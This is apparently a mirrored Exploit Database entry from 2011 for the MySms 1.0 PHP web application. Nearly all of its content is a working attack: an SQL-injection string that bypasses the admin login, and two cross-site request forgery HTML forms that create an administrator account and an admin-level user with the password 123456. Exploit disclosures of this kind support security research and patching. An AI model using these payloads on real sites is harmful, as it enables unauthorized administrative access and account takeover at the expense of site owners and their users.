MySms 1.0 – Multiple Vulnerabilities

• Exploit Database
• 121 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2011-03-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16279/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49

  MySms v1.0 Multiple Vulnerabilities ====================================================================   #################################################################### .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]   ####################################################################   ===[ Exploit ]===   [1]Auth Bypass ===============   www.site.com/MySms/admin/index.php   Username: &apos;or&apos;a&apos;=&apos;a Password: &apos;or&apos;a&apos;=&apos;a   [2]CSRF ======= [Add Admin] ------------   <form method="POST" name="form0" action="http://www.site/MySms/admin/adminadd.php"> <input type="hidden" name="username" value="Webadmin"/> <input type="hidden" name="passwd" value="123456"/> </form>   </body> </html>     [Add User] -----------   <form method="POST" name="form0" action="http://www.site/MySms/admin/usersadd.php"> <input type="hidden" name="username" value="user"/> <input type="hidden" name="passwd" value="123456"/> <input type="hidden" name="active" value="y"/> <input type="hidden" name="email" value="Example@hotmail.com"/> <input type="hidden" name="sex" value="m"/> <input type="hidden" name="level" value="a"/> <input type="hidden" name="num_msg" value="100"/> </form>   </body> </html> ####################################################################